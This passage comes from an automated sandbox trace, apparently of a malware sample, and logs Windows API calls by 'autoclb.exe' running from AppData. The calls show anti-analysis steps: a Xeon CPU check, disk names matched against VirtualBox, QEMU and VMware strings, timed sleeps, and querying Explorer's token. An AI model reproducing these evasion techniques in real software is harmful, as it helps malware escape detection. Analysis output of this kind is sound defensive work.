flAllocationType=0x3000, flProtect=0x4) returned 0x2100000 [0070.442] ReadFile (in: hFile=0x184, lpBuffer=0x2100000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x2100000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0070.463] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000 [0070.504] CloseHandle (hObject=0x184) returned 1 [0070.504] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.510] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.516] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x1f10000) returned 0x0 [0070.520] ExitProcess (uExitCode=0x0) Thread: id = 20 os_tid = 0xfb0 Process: id = "7" image_name = "autoclb.exe" filename = "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe" page_root = "0x68826000" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xfa8" cmd_line = "\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 553 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 554 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 555 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 556 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 557 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 558 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 559 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 560 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 561 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "autoclb.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe") Region: id = 562 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 563 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 564 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 565 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 566 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 567 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 568 start_va = 0x7fff0000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 569 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 570 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 577 start_va = 0x400000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 585 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 586 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 587 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 588 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 590 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 591 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 592 start_va = 0x230000 end_va = 0x2edfff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 593 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 594 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 595 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 596 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 597 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 598 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 599 start_va = 0x75220000 end_va = 0x75255fff entry_point = 0x75220000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 600 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 601 start_va = 0x753b0000 end_va = 0x753f3fff entry_point = 0x753b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 602 start_va = 0x75430000 end_va = 0x767eefff entry_point = 0x75430000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 603 start_va = 0x76810000 end_va = 0x7681efff entry_point = 0x76810000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 604 start_va = 0x768b0000 end_va = 0x76999fff entry_point = 0x768b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 605 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 606 start_va = 0x76a90000 end_va = 0x76c34fff entry_point = 0x76a90000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 607 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 608 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 609 start_va = 0x76e40000 end_va = 0x76ff9fff entry_point = 0x76e40000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 610 start_va = 0x77000000 end_va = 0x7714cfff entry_point = 0x77000000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 611 start_va = 0x77150000 end_va = 0x7728ffff entry_point = 0x77150000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 612 start_va = 0x77290000 end_va = 0x772d3fff entry_point = 0x77290000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 613 start_va = 0x77340000 end_va = 0x773ccfff entry_point = 0x77340000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 614 start_va = 0x773f0000 end_va = 0x778ccfff entry_point = 0x773f0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 615 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 616 start_va = 0x77c30000 end_va = 0x77c3bfff entry_point = 0x77c30000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 617 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 618 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 621 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 622 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 623 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 624 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 625 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 626 start_va = 0x710000 end_va = 0x897fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 627 start_va = 0x8a0000 end_va = 0xa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 628 start_va = 0xa30000 end_va = 0x1e2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 629 start_va = 0x75400000 end_va = 0x7542afff entry_point = 0x75400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 630 start_va = 0x778d0000 end_va = 0x779effff entry_point = 0x778d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 631 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 632 start_va = 0x1e30000 end_va = 0x223ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 633 start_va = 0x74b10000 end_va = 0x74b30fff entry_point = 0x74b10000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 634 start_va = 0x2240000 end_va = 0x2576fff entry_point = 0x2240000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 635 start_va = 0x76d40000 end_va = 0x76d81fff entry_point = 0x76d40000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 636 start_va = 0x76d30000 end_va = 0x76d3dfff entry_point = 0x76d30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 637 start_va = 0x77ab0000 end_va = 0x77c24fff entry_point = 0x77ab0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 639 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 654 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 655 start_va = 0x2580000 end_va = 0x2741fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 656 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 657 start_va = 0x2580000 end_va = 0x2741fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 658 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 659 start_va = 0x2580000 end_va = 0x2741fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 660 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 661 start_va = 0x2580000 end_va = 0x2741fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 666 start_va = 0x2580000 end_va = 0x26b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 675 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 676 start_va = 0x26c0000 end_va = 0x2881fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 677 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 678 start_va = 0x26c0000 end_va = 0x2881fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 679 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 680 start_va = 0x26c0000 end_va = 0x2881fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Thread: id = 21 os_tid = 0xfbc [0070.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401646, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x174 [0070.495] CloseHandle (hObject=0x174) returned 1 [0070.495] RtlExitUserThread (Status=0x0) Thread: id = 22 os_tid = 0xfc0 Thread: id = 23 os_tid = 0xfc4 [0070.535] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0070.535] GetCommandLineW () returned="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" [0070.535] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0070.535] GetComputerNameA (in: lpBuffer=0x5dfcc4, nSize=0x5dfd50 | out: lpBuffer="LHNIWSJ", nSize=0x5dfd50) returned 1 [0070.536] lstrlenA (lpString="LHNIWSJ") returned 7 [0070.536] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x5dfd48 | out: phkResult=0x5dfd48*=0x174) returned 0x0 [0070.536] RegQueryValueExA (in: hKey=0x174, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x5dfd44, lpcbData=0x5dfd50*=0x4 | out: lpType=0x0, lpData=0x5dfd44*=0x41, lpcbData=0x5dfd50*=0x4) returned 0x0 [0070.536] RegCloseKey (hKey=0x174) returned 0x0 [0070.536] wsprintfA (in: param_1=0x5dfea8, param_2="%8X" | out: param_1="98F9CE91") returned 8 [0070.536] GetTempPathA (in: nBufferLength=0x100, lpBuffer=0x5dfda8 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0070.536] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpString2="98F9CE91" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" [0070.536] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 45 [0070.536] mbstowcs (in: _Dest=0x22285a8, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", _MaxCount=0x2e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2d [0070.536] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2e [0070.536] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91", lpDst=0x2228610, nSize=0x2e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91") returned 0x2e [0070.536] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\98F9CE91" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\98f9ce91"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.536] GetLastError () returned 0x2 [0070.546] wsprintfA (in: param_1=0x5dfeb4, param_2="%c%c%c%c" | out: param_1="Inte") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfeb8, param_2="%c%c%c%c" | out: param_1="l (R") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfebc, param_2="%c%c%c%c" | out: param_1=") Co") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfec0, param_2="%c%c%c%c" | out: param_1="re(T") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfec4, param_2="%c%c%c%c" | out: param_1="M) i") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfec8, param_2="%c%c%c%c" | out: param_1="5-75") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfecc, param_2="%c%c%c%c" | out: param_1="00 C") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfed0, param_2="%c%c%c%c" | out: param_1="PU @") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfed4, param_2="%c%c%c%c" | out: param_1=" 3.4") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfed8, param_2="%c%c%c%c" | out: param_1="0GHz") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfedc, param_2="%c%c%c%c" | out: param_1="") returned 4 [0070.546] wsprintfA (in: param_1=0x5dfee0, param_2="%c%c%c%c" | out: param_1="") returned 4 [0070.546] strstr (_Str="INTEL (R) CORE(TM) I5-7500 CPU @ 3.40GHZ", _SubStr="XEON") returned 0x0 [0070.547] SetupDiGetClassDevsA (ClassGuid=0x5dfe90*(Data1=0x4d36e967, Data2=0xe325, Data3=0x11ce, Data4=([0]=0xbf, [1]=0xc1, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0xe1, [6]=0x3, [7]=0x18)), Enumerator=0x0, hwndParent=0x0, Flags=0x2) returned 0x618850 [0070.555] SetupDiEnumDeviceInfo (in: DeviceInfoSet=0x618850, MemberIndex=0x0, DeviceInfoData=0x5dfea0 | out: DeviceInfoData=0x5dfea0) returned 1 [0070.555] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x618850, DeviceInfoData=0x5dfea0, Property=0xc, PropertyRegDataType=0x5dfec8, PropertyBuffer=0x0, PropertyBufferSize=0x0, RequiredSize=0x5dfeec | out: PropertyRegDataType=0x5dfec8, PropertyBuffer=0x0, RequiredSize=0x5dfeec) returned 0 [0070.555] SetupDiGetDeviceRegistryPropertyA (in: DeviceInfoSet=0x618850, DeviceInfoData=0x5dfea0, Property=0xc, PropertyRegDataType=0x5dfec8, PropertyBuffer=0x2228618, PropertyBufferSize=0xb, RequiredSize=0x5dfeec | out: PropertyRegDataType=0x5dfec8, PropertyBuffer=0x2228618, RequiredSize=0x5dfeec) returned 1 [0070.555] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vbox") returned 0x0 [0070.557] StrStrIA (lpFirst="WD5000AVDS", lpSrch="qemu") returned 0x0 [0070.557] StrStrIA (lpFirst="WD5000AVDS", lpSrch="vmware") returned 0x0 [0070.557] StrStrIA (lpFirst="WD5000AVDS", lpSrch="virtual hd") returned 0x0 [0070.557] SetupDiDestroyDeviceInfoList (DeviceInfoSet=0x618850) returned 1 [0070.563] GetTickCount () returned 0x24d0c [0070.563] Sleep (dwMilliseconds=0x1f4) [0071.083] Sleep (dwMilliseconds=0x1f4) [0071.592] Sleep (dwMilliseconds=0x1f4) [0072.092] Sleep (dwMilliseconds=0x1f4) [0072.598] Sleep (dwMilliseconds=0x1f4) [0073.099] Sleep (dwMilliseconds=0x1f4) [0073.603] Sleep (dwMilliseconds=0x1f4) [0074.119] Sleep (dwMilliseconds=0x1f4) [0074.634] Sleep (dwMilliseconds=0x1f4) [0075.150] Sleep (dwMilliseconds=0x1f4) [0075.652] SwitchToThread () returned 1 [0075.693] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.693] SwitchToThread () returned 1 [0075.853] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.853] SwitchToThread () returned 1 [0075.854] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.854] SwitchToThread () returned 1 [0075.854] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.855] SwitchToThread () returned 1 [0075.880] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.881] SwitchToThread () returned 1 [0075.886] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.886] SwitchToThread () returned 1 [0075.889] lstrcpynA (in: lpString1=0x5dfecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0075.890] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0075.890] GetVersion () returned 0x23f00206 [0075.890] GetCurrentProcessId () returned 0xfb8 [0075.890] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc4 [0075.890] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x22285a8, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\adsldraw\\autoclb.exe")) returned 0x36 [0075.890] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpszLongPath=0x0, cchBuffer=0x0 | out: lpszLongPath=0x0) returned 0x3b [0075.891] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpszLongPath=0x22287b8, cchBuffer=0x3b | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0x3a [0075.892] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0075.892] GetProcAddress (hModule=0x75260000, lpProcName="IsWow64Process") returned 0x752796e0 [0075.892] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x5dfee8 | out: Wow64Process=0x5dfee8) returned 1 [0075.892] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77150000 [0075.892] GetProcAddress (hModule=0x77150000, lpProcName="GetWindowThreadProcessId") returned 0x7716ba70 [0075.892] FindWindowA (lpClassName="ProgMan", lpWindowName=0x0) returned 0x100c8 [0075.892] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0x5dfeec | out: lpdwProcessId=0x5dfeec) returned 0x55c [0075.892] NtOpenProcess (in: ProcessHandle=0x5dfee0, DesiredAccess=0x400, ObjectAttributes=0x5dfec0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x5dfed8*(UniqueProcess=0x508, UniqueThread=0x0) | out: ProcessHandle=0x5dfee0*=0x174) returned 0x0 [0075.892] NtOpenProcessToken (in: ProcessHandle=0x174, DesiredAccess=0x8, TokenHandle=0x5dfee4 | out: TokenHandle=0x5dfee4*=0x17c) returned 0x0 [0075.892] NtQueryInformationToken (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5dfef0 | out: TokenInformation=0x0, ReturnLength=0x5dfef0) returned 0xc0000023 [0075.892] NtQueryInformationToken (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x22285a8, TokenInformationLength=0x24, ReturnLength=0x5dfef0 | out: TokenInformation=0x22285a8, ReturnLength=0x5dfef0) returned 0x0 [0075.892] NtClose (Handle=0x17c) returned 0x0 [0075.893] NtClose (Handle=0x174) returned 0x0 [0075.893] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0075.893] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x22286d0, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0075.893] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0075.893] GetFileTime (in: hFile=0x174, lpCreationTime=0x5dfeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x5dfeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), 